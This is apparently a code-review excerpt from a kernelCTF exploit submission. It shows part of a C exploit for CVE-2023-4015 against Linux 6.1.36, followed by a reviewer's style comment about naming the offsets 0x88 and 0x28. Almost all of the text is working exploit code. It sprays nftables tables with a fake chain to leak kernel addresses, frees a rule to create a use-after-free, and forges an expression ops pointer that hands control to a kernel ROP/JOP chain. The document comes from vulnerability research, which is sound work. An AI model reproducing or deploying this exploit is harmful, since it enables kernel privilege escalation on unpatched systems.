pocs/linux/kernelctf/CVE-2023-4015_lts_2/exploit/lts-6.1.36/exploit.c

```diff
@@ -0,0 +1,654 @@
+    static int table_spray_counter = 0;
+
+    char data[128] = {0};
+    struct nft_chain *fake_chain = (struct nft_chain *)data;
+    // set rule list and chain flag for later stage
+    // because we trigger RIP control by deleting the primitive rule,
+    // the immediate expression deactivation will only call deactivate()
+    // on the rules under this chain if chain flags has NFT_CHAIN_BINDING.
+    fake_chain->rules.next = fake_chain->rules.prev = (struct list_head *)heap;
+    fake_chain->flags = NFT_CHAIN_BINDING;
+    // exprs are flattened after rule metadata, then comes userdata
+    // we prepared a notrack expr before, now let's leak its ops
+    fake_chain->name = (char *)(heap + sizeof(struct nft_rule));
+
+    for (int z = 0; z < SPRAY_BATCHES; ++z) {
+        batch b = batch_init(1048576); // 1M buffer should be enough
+        for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) {
+            char table_name[32];
+            sprintf(table_name, "tskb%d", table_spray_counter++);
+            table t = make_table(table_name, data, sizeof(data));
+            batch_new_table(b, t);
+            nftnl_table_free(t);
+        }
+        batch_end(b);
+        if (batch_send(b, nlsock) == -1) {
+            ERROR("batch_send");
+            return -1;
+        }
+        batch_free(b);
+        if (run_callbacks(nlsock, NULL, NULL) < 0) {
+            ERROR("run_callbacks");
+            return -1;
+        }
+    }
+
+    char buf[MNL_SOCKET_BUFFER_SIZE];
+    rule r_primitive = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4
+    rseq = seq;
+    nlmsghdr hdr = dump_rule(r_primitive, buf);
+    if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) {
+        ERROR("mnl_socket_sendto");
+        return -1;
+    }
+    if (run_callbacks(nlsock, dump_exprs, dump_expr_leak_vmlinux) < 0) {
+        ERROR("run_callbacks");
+        return -1;
+    }
+
+    return 0;
+}
+
+static int spray_krop() {
+    INFO("Spraying KROP");
+    static int table_spray_counter = 0;
+
+    rule r_to_delete = make_rule(current_table_name, "spray", NULL, 0, NULL, 0, rule_handle);
+
+    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
+    batch_del_rule(b, r_to_delete);
+    batch_end(b);
+    if (batch_send(b, nlsock) == -1) {
+        ERROR("batch_send");
+        return -1;
+    }
+    batch_free(b);
+    if (run_callbacks(nlsock, NULL, NULL) < 0) {
+        ERROR("run_callbacks");
+        return -1;
+    }
+
+    INFO("Sleeping to wait for the work queue to actually free the rule");
+    sleep(1);
+
+    save_state();
+
+    char data[192] = {0};
+    struct nft_rule *fake_rule = (struct nft_rule *)data;
+    fake_rule->dlen = 1; // pass the check
+    struct nft_expr *fake_expr = (struct nft_expr *)(data + sizeof(struct nft_rule));
+    fake_expr->ops = (struct nft_expr_ops *)(heap + 0x88 - 0x28); // offset 0x88 of fake rule <=> expr->ops->deactivate (offset 0x28 of expr->ops)
```

Comment:
Do I understand correctly, that you selected the offset 0x88 based on where was free space in the ROP chain and 0x28 is the offset of nft_expr_ops's deactivate field?

Can you use #define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28 and use that macro?

And also move 0x88 into a variable (e.g. deactivate_offset) or define and set the JOP gadget via rop[deactivate_offset/8] = vmlinux + PUSH_RSI_JMP_QWORD_PTR_RSI_F instead of *rop++ = vmlinux + PUSH_RSI_JMP_QWORD_PTR_RSI_F;, so the connection is more clear?

More info is in [our style guide](https://google.github.io/security-research/kernelctf/style_guide#approach-2).